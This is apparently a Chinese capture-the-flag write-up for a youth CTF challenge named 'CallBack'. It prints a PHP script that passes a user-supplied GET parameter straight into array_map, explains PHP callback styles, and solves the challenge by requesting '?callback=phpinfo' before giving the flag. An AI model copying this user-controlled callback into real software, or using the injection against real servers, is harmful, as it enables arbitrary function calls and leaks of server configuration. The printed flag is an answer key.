【青少年CTF S1·2026 公益赛】CallBack

php 复制代码
<?php
function executeCallback($callback)
{
    $someArray = [0, 1, 2, 3];
    return array_map($callback, $someArray);
}

if (isset($_GET['callback'])) {
    $evilCallback = $_GET['callback'];
    $newArray = executeCallback($evilCallback);
}
?>

什么是回调函数?

回调函数就是函数被当作参数传递给另一个函数,并在合适的实践被"调用"

PHP中4种常见的回调函数写法

1、普通回调函数(字符串传递函数名)

php 复制代码
function sayHi($name) {
    echo "Hi, $name";
}
// 调用:直接传函数名字符串
call_user_func('sayHi', 'Tom');

2、匿名函数回调(最常用)

不同提取定义函数,直接写在参数里面

php 复制代码
$numbers = [1,2,3];
$newArr = array_map(function($n) {
    return $n + 1;
}, $numbers);

3、类方法回调

php 复制代码
class Test {
    public static function hello() {
        echo "Hello";
    }
}
// 静态方法回调
call_user_func(['Test', 'hello']);

4、对象方法回调

php 复制代码
class Test {
    public function hi() {
        echo "Hi";
    }
}
$obj = new Test();
call_user_func([$obj, 'hi']);

题目用 array_map($callback, 0,1,2,3),这意味着用户传入的函数会被执行,但参数被强制固定为数字 0-3。

当我们传递system()的时候,PHP会执行system(0)、system(1)、system(2)、system(3)

因此不能传递system()函数

这题直接使用phpinfo,phpinfo可以接收整数参数

php 复制代码
http://challenge.qsnctf.com:55842/?callback=phpinfo

直接在配置信息中找到flag

php 复制代码
qsnctf{c893c0079b974676b4dbffad9c43b7d8}
相关推荐
HackTwoHub8 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
ccino .10 小时前
Hackerone-地址栏xss
网络安全·xss
数据知道11 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
txg66612 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
红信鸽13 小时前
2026 年 AI 钓鱼攻击现状与防御深度解析
网络安全
数据知道16 小时前
安全实验室搭建指南:一台电脑搭出完整靶场环境
安全·网络安全·电脑
LYFlied1 天前
EVMbench解读:AI Agent如何检测、修复并利用智能合约漏洞
人工智能·网络安全·openai·智能合约·ai agent·evm·智能合约区块链
Hiyajo pray1 天前
属性sdn隐私保护分析
网络安全
Hiyajo pray2 天前
属性sdn的隐私保护策略(1)
网络安全
HackTwoHub2 天前
某单位 CMS 完整渗透链、SQL 注入→后台拿权→绕过宝塔 Waf 上线 shell
数据库·人工智能·sql·安全·网络安全·系统安全·安全架构